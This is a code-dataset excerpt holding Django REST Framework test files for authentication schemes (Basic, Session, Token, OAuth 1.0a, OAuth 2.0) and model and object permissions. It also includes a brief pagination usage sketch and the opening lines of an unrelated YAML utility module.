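A short usage sketch for the serializer above, following the DRF 2.x-era pattern of wrapping a Django paginator page; the object list is illustrative:

```python
from django.core.paginator import Paginator
from rest_framework.pagination import PaginationSerializer

objects = ['john', 'paul', 'george', 'ringo']
paginator = Paginator(objects, 2)       # two items per page
page = paginator.page(1)

serializer = PaginationSerializer(instance=page)
serializer.data
# {'count': 4, 'next': '?page=2', 'previous': None, 'results': ['john', 'paul']}
```

Without a `request` in the serializer context, `NextPageField` falls back to an empty base URL, so the link renders as a bare query string such as `?page=2`.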
#### File: rest_framework/tests/test_authentication.py
```python
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.test import Client, TestCase
from django.utils import unittest
from rest_framework import HTTP_HEADER_ENCODING
from rest_framework import exceptions
from rest_framework import permissions
from rest_framework import renderers
from rest_framework.response import Response
from rest_framework import status
from rest_framework.authentication import (
BaseAuthentication,
TokenAuthentication,
BasicAuthentication,
SessionAuthentication,
OAuthAuthentication,
OAuth2Authentication
)
from rest_framework.authtoken.models import Token
from rest_framework.compat import patterns, url, include
from rest_framework.compat import oauth2_provider, oauth2_provider_models, oauth2_provider_scope
from rest_framework.compat import oauth, oauth_provider
from rest_framework.tests.utils import RequestFactory
from rest_framework.views import APIView
import json
import base64
import time
import datetime
factory = RequestFactory()
class MockView(APIView):
permission_classes = (permissions.IsAuthenticated,)
def get(self, request):
return HttpResponse({'a': 1, 'b': 2, 'c': 3})
def post(self, request):
return HttpResponse({'a': 1, 'b': 2, 'c': 3})
def put(self, request):
return HttpResponse({'a': 1, 'b': 2, 'c': 3})
urlpatterns = patterns('',
(r'^session/$', MockView.as_view(authentication_classes=[SessionAuthentication])),
(r'^basic/$', MockView.as_view(authentication_classes=[BasicAuthentication])),
(r'^token/$', MockView.as_view(authentication_classes=[TokenAuthentication])),
(r'^auth-token/$', 'rest_framework.authtoken.views.obtain_auth_token'),
(r'^oauth/$', MockView.as_view(authentication_classes=[OAuthAuthentication])),
(r'^oauth-with-scope/$', MockView.as_view(authentication_classes=[OAuthAuthentication],
permission_classes=[permissions.TokenHasReadWriteScope]))
)
if oauth2_provider is not None:
urlpatterns += patterns('',
url(r'^oauth2/', include('provider.oauth2.urls', namespace='oauth2')),
url(r'^oauth2-test/$', MockView.as_view(authentication_classes=[OAuth2Authentication])),
url(r'^oauth2-with-scope-test/$', MockView.as_view(authentication_classes=[OAuth2Authentication],
permission_classes=[permissions.TokenHasReadWriteScope])),
)
class BasicAuthTests(TestCase):
"""Basic authentication"""
urls = 'rest_framework.tests.test_authentication'
def setUp(self):
self.csrf_client = Client(enforce_csrf_checks=True)
self.username = 'john'
self.email = '<EMAIL>'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
def test_post_form_passing_basic_auth(self):
"""Ensure POSTing json over basic auth with correct credentials passes and does not require CSRF"""
credentials = ('%s:%s' % (self.username, self.password))
base64_credentials = base64.b64encode(credentials.encode(HTTP_HEADER_ENCODING)).decode(HTTP_HEADER_ENCODING)
auth = 'Basic %s' % base64_credentials
response = self.csrf_client.post('/basic/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_json_passing_basic_auth(self):
"""Ensure POSTing form over basic auth with correct credentials passes and does not require CSRF"""
credentials = ('%s:%s' % (self.username, self.password))
base64_credentials = base64.b64encode(credentials.encode(HTTP_HEADER_ENCODING)).decode(HTTP_HEADER_ENCODING)
auth = 'Basic %s' % base64_credentials
response = self.csrf_client.post('/basic/', json.dumps({'example': 'example'}), 'application/json', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_form_failing_basic_auth(self):
"""Ensure POSTing form over basic auth without correct credentials fails"""
response = self.csrf_client.post('/basic/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_post_json_failing_basic_auth(self):
"""Ensure POSTing json over basic auth without correct credentials fails"""
response = self.csrf_client.post('/basic/', json.dumps({'example': 'example'}), 'application/json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response['WWW-Authenticate'], 'Basic realm="api"')
class SessionAuthTests(TestCase):
"""User session authentication"""
urls = 'rest_framework.tests.test_authentication'
def setUp(self):
self.csrf_client = Client(enforce_csrf_checks=True)
self.non_csrf_client = Client(enforce_csrf_checks=False)
self.username = 'john'
self.email = '<EMAIL>'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
def tearDown(self):
self.csrf_client.logout()
def test_post_form_session_auth_failing_csrf(self):
"""
Ensure POSTing form over session authentication without CSRF token fails.
"""
self.csrf_client.login(username=self.username, password=self.password)
response = self.csrf_client.post('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_post_form_session_auth_passing(self):
"""
Ensure POSTing form over session authentication with logged in user and CSRF token passes.
"""
self.non_csrf_client.login(username=self.username, password=self.password)
response = self.non_csrf_client.post('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_put_form_session_auth_passing(self):
"""
Ensure PUTting form over session authentication with logged in user and CSRF token passes.
"""
self.non_csrf_client.login(username=self.username, password=self.password)
response = self.non_csrf_client.put('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_form_session_auth_failing(self):
"""
Ensure POSTing form over session authentication without logged in user fails.
"""
response = self.csrf_client.post('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TokenAuthTests(TestCase):
"""Token authentication"""
urls = 'rest_framework.tests.test_authentication'
def setUp(self):
self.csrf_client = Client(enforce_csrf_checks=True)
self.username = 'john'
self.email = '<EMAIL>'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
self.key = '<KEY>'
self.token = Token.objects.create(key=self.key, user=self.user)
def test_post_form_passing_token_auth(self):
"""Ensure POSTing json over token auth with correct credentials passes and does not require CSRF"""
auth = 'Token ' + self.key
response = self.csrf_client.post('/token/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_json_passing_token_auth(self):
"""Ensure POSTing form over token auth with correct credentials passes and does not require CSRF"""
auth = "Token " + self.key
response = self.csrf_client.post('/token/', json.dumps({'example': 'example'}), 'application/json', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_form_failing_token_auth(self):
"""Ensure POSTing form over token auth without correct credentials fails"""
response = self.csrf_client.post('/token/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_post_json_failing_token_auth(self):
"""Ensure POSTing json over token auth without correct credentials fails"""
response = self.csrf_client.post('/token/', json.dumps({'example': 'example'}), 'application/json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_token_has_auto_assigned_key_if_none_provided(self):
"""Ensure creating a token with no key will auto-assign a key"""
self.token.delete()
token = Token.objects.create(user=self.user)
self.assertTrue(bool(token.key))
def test_token_login_json(self):
"""Ensure token login view using JSON POST works."""
client = Client(enforce_csrf_checks=True)
response = client.post('/auth-token/',
json.dumps({'username': self.username, 'password': <PASSWORD>}), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(json.loads(response.content.decode('ascii'))['token'], self.key)
def test_token_login_json_bad_creds(self):
"""Ensure token login view using JSON POST fails if bad credentials are used."""
client = Client(enforce_csrf_checks=True)
response = client.post('/auth-token/',
json.dumps({'username': self.username, 'password': "<PASSWORD>"}), 'application/json')
self.assertEqual(response.status_code, 400)
def test_token_login_json_missing_fields(self):
"""Ensure token login view using JSON POST fails if missing fields."""
client = Client(enforce_csrf_checks=True)
response = client.post('/auth-token/',
json.dumps({'username': self.username}), 'application/json')
self.assertEqual(response.status_code, 400)
def test_token_login_form(self):
"""Ensure token login view using form POST works."""
client = Client(enforce_csrf_checks=True)
response = client.post('/auth-token/',
{'username': self.username, 'password': self.password})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(json.loads(response.content.decode('ascii'))['token'], self.key)
class IncorrectCredentialsTests(TestCase):
def test_incorrect_credentials(self):
"""
If a request contains bad authentication credentials, then
authentication should run and error, even if no permissions
are set on the view.
"""
class IncorrectCredentialsAuth(BaseAuthentication):
def authenticate(self, request):
raise exceptions.AuthenticationFailed('Bad credentials')
request = factory.get('/')
view = MockView.as_view(
authentication_classes=(IncorrectCredentialsAuth,),
permission_classes=()
)
response = view(request)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(response.data, {'detail': 'Bad credentials'})
class OAuthTests(TestCase):
"""OAuth 1.0a authentication"""
urls = 'rest_framework.tests.test_authentication'
def setUp(self):
# these imports are here because oauth is optional and hiding them in try..except block or compat
# could obscure problems if something breaks
from oauth_provider.models import Consumer, Resource
from oauth_provider.models import Token as OAuthToken
from oauth_provider import consts
self.consts = consts
self.csrf_client = Client(enforce_csrf_checks=True)
self.username = 'john'
self.email = '<EMAIL>'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
self.CONSUMER_KEY = 'consumer_key'
self.CONSUMER_SECRET = 'consumer_secret'
self.TOKEN_KEY = "token_key"
self.TOKEN_SECRET = "token_secret"
self.consumer = Consumer.objects.create(key=self.CONSUMER_KEY, secret=self.CONSUMER_SECRET,
name='example', user=self.user, status=self.consts.ACCEPTED)
self.resource = Resource.objects.create(name="resource name", url="api/")
self.token = OAuthToken.objects.create(user=self.user, consumer=self.consumer, resource=self.resource,
token_type=OAuthToken.ACCESS, key=self.TOKEN_KEY, secret=self.TOKEN_SECRET, is_approved=True
)
def _create_authorization_header(self):
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time()),
'oauth_token': self.token.key,
'oauth_consumer_key': self.consumer.key
}
req = oauth.Request(method="GET", url="http://example.com", parameters=params)
signature_method = oauth.SignatureMethod_PLAINTEXT()
req.sign_request(signature_method, self.consumer, self.token)
return req.to_header()["Authorization"]
def _create_authorization_url_parameters(self):
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time()),
'oauth_token': self.token.key,
'oauth_consumer_key': self.consumer.key
}
req = oauth.Request(method="GET", url="http://example.com", parameters=params)
signature_method = oauth.SignatureMethod_PLAINTEXT()
req.sign_request(signature_method, self.consumer, self.token)
return dict(req)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_passing_oauth(self):
"""Ensure POSTing form over OAuth with correct credentials passes and does not require CSRF"""
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_repeated_nonce_failing_oauth(self):
"""Ensure POSTing form over OAuth with repeated auth (same nonces and timestamp) credentials fails"""
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
        # simulate replay attack: auth header contains an already used (nonce, timestamp) pair
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_token_removed_failing_oauth(self):
"""Ensure POSTing when there is no OAuth access token in db fails"""
self.token.delete()
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_consumer_status_not_accepted_failing_oauth(self):
"""Ensure POSTing when consumer status is anything other than ACCEPTED fails"""
for consumer_status in (self.consts.CANCELED, self.consts.PENDING, self.consts.REJECTED):
self.consumer.status = consumer_status
self.consumer.save()
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_with_request_token_failing_oauth(self):
"""Ensure POSTing with unauthorized request token instead of access token fails"""
self.token.token_type = self.token.REQUEST
self.token.save()
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_with_urlencoded_parameters(self):
"""Ensure POSTing with x-www-form-urlencoded auth parameters passes"""
params = self._create_authorization_url_parameters()
response = self.csrf_client.post('/oauth/', params)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_get_form_with_url_parameters(self):
"""Ensure GETing with auth in url parameters passes"""
params = self._create_authorization_url_parameters()
response = self.csrf_client.get('/oauth/', params)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_hmac_sha1_signature_passes(self):
"""Ensure POSTing using HMAC_SHA1 signature method passes"""
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time()),
'oauth_token': self.token.key,
'oauth_consumer_key': self.consumer.key
}
req = oauth.Request(method="POST", url="http://testserver/oauth/", parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
req.sign_request(signature_method, self.consumer, self.token)
auth = req.to_header()["Authorization"]
response = self.csrf_client.post('/oauth/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_get_form_with_readonly_resource_passing_auth(self):
"""Ensure POSTing with a readonly resource instead of a write scope fails"""
read_only_access_token = self.token
read_only_access_token.resource.is_readonly = True
read_only_access_token.resource.save()
params = self._create_authorization_url_parameters()
response = self.csrf_client.get('/oauth-with-scope/', params)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_with_readonly_resource_failing_auth(self):
"""Ensure POSTing with a readonly resource instead of a write scope fails"""
read_only_access_token = self.token
read_only_access_token.resource.is_readonly = True
read_only_access_token.resource.save()
params = self._create_authorization_url_parameters()
response = self.csrf_client.post('/oauth-with-scope/', params)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_with_write_resource_passing_auth(self):
"""Ensure POSTing with a write resource succeed"""
read_write_access_token = self.token
read_write_access_token.resource.is_readonly = False
read_write_access_token.resource.save()
params = self._create_authorization_url_parameters()
response = self.csrf_client.post('/oauth-with-scope/', params)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_bad_consumer_key(self):
"""Ensure POSTing using HMAC_SHA1 signature method passes"""
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time()),
'oauth_token': self.token.key,
'oauth_consumer_key': 'badconsumerkey'
}
req = oauth.Request(method="POST", url="http://testserver/oauth/", parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
req.sign_request(signature_method, self.consumer, self.token)
auth = req.to_header()["Authorization"]
response = self.csrf_client.post('/oauth/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_bad_token_key(self):
"""Ensure POSTing using HMAC_SHA1 signature method passes"""
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time()),
'oauth_token': '<PASSWORD>',
'oauth_consumer_key': self.consumer.key
}
req = oauth.Request(method="POST", url="http://testserver/oauth/", parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
req.sign_request(signature_method, self.consumer, self.token)
auth = req.to_header()["Authorization"]
response = self.csrf_client.post('/oauth/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
class OAuth2Tests(TestCase):
"""OAuth 2.0 authentication"""
urls = 'rest_framework.tests.test_authentication'
def setUp(self):
self.csrf_client = Client(enforce_csrf_checks=True)
self.username = 'john'
self.email = '<EMAIL>'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
self.CLIENT_ID = 'client_key'
self.CLIENT_SECRET = 'client_secret'
self.ACCESS_TOKEN = "access_token"
self.REFRESH_TOKEN = "refresh_token"
self.oauth2_client = oauth2_provider_models.Client.objects.create(
client_id=self.CLIENT_ID,
client_secret=self.CLIENT_SECRET,
redirect_uri='',
client_type=0,
name='example',
user=None,
)
self.access_token = oauth2_provider_models.AccessToken.objects.create(
token=self.ACCESS_TOKEN,
client=self.oauth2_client,
user=self.user,
)
self.refresh_token = oauth2_provider_models.RefreshToken.objects.create(
user=self.user,
access_token=self.access_token,
client=self.oauth2_client
)
def _create_authorization_header(self, token=None):
return "Bearer {0}".format(token or self.access_token.token)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_get_form_with_wrong_authorization_header_token_type_failing(self):
"""Ensure that a wrong token type lead to the correct HTTP error status code"""
auth = "<PASSWORD>"
response = self.csrf_client.get('/oauth2-test/', {}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
response = self.csrf_client.get('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_get_form_with_wrong_authorization_header_token_format_failing(self):
"""Ensure that a wrong token format lead to the correct HTTP error status code"""
auth = "<PASSWORD>"
response = self.csrf_client.get('/oauth2-test/', {}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
response = self.csrf_client.get('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_get_form_with_wrong_authorization_header_token_failing(self):
"""Ensure that a wrong token lead to the correct HTTP error status code"""
auth = "<PASSWORD>"
response = self.csrf_client.get('/oauth2-test/', {}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
response = self.csrf_client.get('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_get_form_passing_auth(self):
"""Ensure GETing form over OAuth with correct client credentials succeed"""
auth = self._create_authorization_header()
response = self.csrf_client.get('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_passing_auth(self):
"""Ensure POSTing form over OAuth with correct credentials passes and does not require CSRF"""
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_token_removed_failing_auth(self):
"""Ensure POSTing when there is no OAuth access token in db fails"""
self.access_token.delete()
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_with_refresh_token_failing_auth(self):
"""Ensure POSTing with refresh token instead of access token fails"""
auth = self._create_authorization_header(token=self.refresh_token.token)
response = self.csrf_client.post('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_with_expired_access_token_failing_auth(self):
"""Ensure POSTing with expired access token fails with an 'Invalid token' error"""
self.access_token.expires = datetime.datetime.now() - datetime.timedelta(seconds=10) # 10 seconds late
self.access_token.save()
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
self.assertIn('Invalid token', response.content)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_with_invalid_scope_failing_auth(self):
"""Ensure POSTing with a readonly scope instead of a write scope fails"""
read_only_access_token = self.access_token
read_only_access_token.scope = oauth2_provider_scope.SCOPE_NAME_DICT['read']
read_only_access_token.save()
auth = self._create_authorization_header(token=read_only_access_token.token)
response = self.csrf_client.get('/oauth2-with-scope-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
response = self.csrf_client.post('/oauth2-with-scope-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_with_valid_scope_passing_auth(self):
"""Ensure POSTing with a write scope succeed"""
read_write_access_token = self.access_token
read_write_access_token.scope = oauth2_provider_scope.SCOPE_NAME_DICT['write']
read_write_access_token.save()
auth = self._create_authorization_header(token=read_write_access_token.token)
response = self.csrf_client.post('/oauth2-with-scope-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
class FailingAuthAccessedInRenderer(TestCase):
def setUp(self):
class AuthAccessingRenderer(renderers.BaseRenderer):
media_type = 'text/plain'
format = 'txt'
def render(self, data, media_type=None, renderer_context=None):
request = renderer_context['request']
if request.user.is_authenticated():
return b'authenticated'
return b'not authenticated'
class FailingAuth(BaseAuthentication):
def authenticate(self, request):
raise exceptions.AuthenticationFailed('authentication failed')
class ExampleView(APIView):
authentication_classes = (FailingAuth,)
renderer_classes = (AuthAccessingRenderer,)
def get(self, request):
return Response({'foo': 'bar'})
self.view = ExampleView.as_view()
def test_failing_auth_accessed_in_renderer(self):
"""
When authentication fails the renderer should still be able to access
`request.user` without raising an exception. Particularly relevant
to HTML responses that might reasonably access `request.user`.
"""
request = factory.get('/')
response = self.view(request)
content = response.render().content
self.assertEqual(content, b'not authenticated')
```
#### File: rest_framework/tests/test_permissions.py
```python
from __future__ import unicode_literals
from django.contrib.auth.models import User, Permission
from django.db import models
from django.test import TestCase
from rest_framework import generics, status, permissions, authentication, HTTP_HEADER_ENCODING
from rest_framework.tests.utils import RequestFactory
import base64
import json
factory = RequestFactory()
class BasicModel(models.Model):
text = models.CharField(max_length=100)
class RootView(generics.ListCreateAPIView):
model = BasicModel
authentication_classes = [authentication.BasicAuthentication]
permission_classes = [permissions.DjangoModelPermissions]
class InstanceView(generics.RetrieveUpdateDestroyAPIView):
model = BasicModel
authentication_classes = [authentication.BasicAuthentication]
permission_classes = [permissions.DjangoModelPermissions]
root_view = RootView.as_view()
instance_view = InstanceView.as_view()
def basic_auth_header(username, password):
credentials = ('%s:%s' % (username, password))
base64_credentials = base64.b64encode(credentials.encode(HTTP_HEADER_ENCODING)).decode(HTTP_HEADER_ENCODING)
return 'Basic %s' % base64_credentials
class ModelPermissionsIntegrationTests(TestCase):
def setUp(self):
User.objects.create_user('disallowed', '<EMAIL>', 'password')
user = User.objects.create_user('permitted', '<EMAIL>', 'password')
user.user_permissions = [
Permission.objects.get(codename='add_basicmodel'),
Permission.objects.get(codename='change_basicmodel'),
Permission.objects.get(codename='delete_basicmodel')
]
user = User.objects.create_user('updateonly', '<EMAIL>', 'password')
user.user_permissions = [
Permission.objects.get(codename='change_basicmodel'),
]
self.permitted_credentials = basic_auth_header('permitted', 'password')
self.disallowed_credentials = basic_auth_header('disallowed', 'password')
self.updateonly_credentials = basic_auth_header('updateonly', 'password')
BasicModel(text='foo').save()
def test_has_create_permissions(self):
request = factory.post('/', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.permitted_credentials)
response = root_view(request, pk=1)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_has_put_permissions(self):
request = factory.put('/1', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.permitted_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_has_delete_permissions(self):
request = factory.delete('/1', HTTP_AUTHORIZATION=self.permitted_credentials)
response = instance_view(request, pk=1)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_does_not_have_create_permissions(self):
request = factory.post('/', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.disallowed_credentials)
response = root_view(request, pk=1)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_does_not_have_put_permissions(self):
request = factory.put('/1', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.disallowed_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_does_not_have_delete_permissions(self):
request = factory.delete('/1', HTTP_AUTHORIZATION=self.disallowed_credentials)
response = instance_view(request, pk=1)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_has_put_as_create_permissions(self):
# User only has update permissions - should be able to update an entity.
request = factory.put('/1', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.updateonly_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# But if PUTing to a new entity, permission should be denied.
request = factory.put('/2', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.updateonly_credentials)
response = instance_view(request, pk='2')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_options_permitted(self):
request = factory.options('/', content_type='application/json',
HTTP_AUTHORIZATION=self.permitted_credentials)
response = root_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('actions', response.data)
self.assertEqual(list(response.data['actions'].keys()), ['POST'])
request = factory.options('/1', content_type='application/json',
HTTP_AUTHORIZATION=self.permitted_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('actions', response.data)
self.assertEqual(list(response.data['actions'].keys()), ['PUT'])
def test_options_disallowed(self):
request = factory.options('/', content_type='application/json',
HTTP_AUTHORIZATION=self.disallowed_credentials)
response = root_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertNotIn('actions', response.data)
request = factory.options('/1', content_type='application/json',
HTTP_AUTHORIZATION=self.disallowed_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertNotIn('actions', response.data)
def test_options_updateonly(self):
request = factory.options('/', content_type='application/json',
HTTP_AUTHORIZATION=self.updateonly_credentials)
response = root_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertNotIn('actions', response.data)
request = factory.options('/1', content_type='application/json',
HTTP_AUTHORIZATION=self.updateonly_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('actions', response.data)
self.assertEqual(list(response.data['actions'].keys()), ['PUT'])
class OwnerModel(models.Model):
text = models.CharField(max_length=100)
owner = models.ForeignKey(User)
class IsOwnerPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
return request.user == obj.owner
class OwnerInstanceView(generics.RetrieveUpdateDestroyAPIView):
model = OwnerModel
authentication_classes = [authentication.BasicAuthentication]
permission_classes = [IsOwnerPermission]
owner_instance_view = OwnerInstanceView.as_view()
class ObjectPermissionsIntegrationTests(TestCase):
"""
Integration tests for the object level permissions API.
"""
def setUp(self):
User.objects.create_user('not_owner', '<EMAIL>', 'password')
user = User.objects.create_user('owner', '<EMAIL>', 'password')
self.not_owner_credentials = basic_auth_header('not_owner', 'password')
self.owner_credentials = basic_auth_header('owner', 'password')
OwnerModel(text='foo', owner=user).save()
def test_owner_has_delete_permissions(self):
request = factory.delete('/1', HTTP_AUTHORIZATION=self.owner_credentials)
response = owner_instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_non_owner_does_not_have_delete_permissions(self):
request = factory.delete('/1', HTTP_AUTHORIZATION=self.not_owner_credentials)
response = owner_instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
``` |
{
"source": "0x656b694d/qyaml",
"score": 3
} |
#### File: src/qyaml/qyaml.py
```python
import sys
from types import NoneType
import yaml
import re
